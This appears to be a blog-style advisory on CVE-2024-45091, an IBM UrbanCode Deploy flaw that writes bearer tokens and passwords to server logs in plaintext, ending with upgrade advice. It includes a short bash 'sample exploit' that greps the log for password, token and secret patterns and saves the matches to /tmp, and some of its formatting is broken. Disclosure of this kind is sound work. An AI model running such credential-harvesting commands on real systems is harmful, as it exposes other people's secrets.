CVE-2024-45091 - IBM UrbanCode Deploy Leaks Sensitive Data in Log Files — What You Need to Know

IBM UrbanCode Deploy (UCD) is a well-known tool for automating application deployments. But if you’re running certain versions, your sensitive data might be sitting in plain sight inside log files. This post will explain what’s going on with CVE-2024-45091, walk through an example exploit, and show you how to protect yourself.

What is CVE-2024-45091?

IBM UrbanCode Deploy versions

7.2 through 7.2.3.13

store potentially sensitive information in HTTP request logs. If a local user or attacker with log file access pokes around, they might find passwords, API tokens, or other personal application data.

IBM has released advisories here

- IBM Security Bulletin - CVE-2024-45091
- NVD Entry

Where is the Sensitive Information?

When you interact with UCD (for example, through the UI or REST API), your HTTP requests may contain credentials, tokens, or configuration secrets. Due to insufficient log sanitization, UCD records the whole request in plaintext to local log files like server.out or server.log.

If an end user or script sends a request to UCD like

POST /rest/deploy/process HTTP/1.1
Host: ucd.example.com
Authorization: Bearer s3cret-token-123
Content-Type: application/json

{
  "application": "MyApp",
  "environment": "Production",
  "properties": {
    "db_password": "dbpass!23"
  }
}

You may unwittingly log something like

2024-06-13T18:45:02Z POST /rest/deploy/process Auth=Bearer s3cret-token-123 properties: {"db_password":"dbpass!23"}

An attacker or any local user who can read the logs could extract all of this — including the API token and database password.

Attacker has local access to the UCD server (local account, or can escalate privileges).

- Attacker can read UCD HTTP log files (e.g., /opt/ucd/server/var/log/server.log).

`shell

ls /opt/ucd/server/var/log/

`shell

grep -i "password" /opt/ucd/server/var/log/server.log
grep -i "Authorization" /opt/ucd/server/var/log/server.log
grep -i "token" /opt/ucd/server/var/log/server.log

Sample Exploit (Bash)

# Find possibly sensitive logs
cd /opt/ucd/server/var/log
grep -Ei '(password|Authorization|token|secret)' server.log > /tmp/suspected_secrets.txt

# Show results
cat /tmp/suspected_secrets.txt

What you get might look like

2024-06-13T18:45:02Z POST /rest/deploy/process Auth=Bearer s3cret-token-123 properties: {"db_password":"dbpass!23"}

Application secrets and other sensitive deployment data

If your UCD server shares a host with other users or processes, the risk is higher.

Mitigation

IBM has already released fixed versions.

Upgrade to the latest UCD version ASAP. Patch links

- IBM Fix Central - UCD

Conclusion

CVE-2024-45091 is a classic example of why it’s critical to keep deployment and CI/CD tools locked down — and up-to-date. Log files are treasure troves for attackers. If you’re running a vulnerable version of IBM UrbanCode Deploy, patch now and check your logs. You never know what secrets you could be leaking.

References

- IBM Security Bulletin for CVE-2024-45091
- National Vulnerability Database - CVE-2024-45091

Timeline

Published on: 01/21/2025 01:15:07 UTC